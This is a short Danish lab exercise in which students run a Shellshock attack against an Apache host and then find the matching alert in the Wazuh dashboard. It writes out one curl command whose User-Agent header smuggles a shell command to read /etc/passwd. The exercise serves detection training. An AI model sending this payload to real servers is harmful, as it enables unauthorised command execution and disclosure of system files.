# Opgave beskrivelse

## Instruktioner

### Opsætning af Wazuh agent

1. Installer apache og overvåg loggen (Såfremt du ikke allerede har gjort dette i opgave 34)

### Udfør angreb

1. Fra den angribende host, eksekver kommandoen sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <Den overvåget host-IP>

### Wazuh dashboard

1. Gå til Security events.

2. filterer på: rule.description:Shellshock attack detected

</br>

# Udføresle af opgave



</br>

# Kilder og brugbar links 
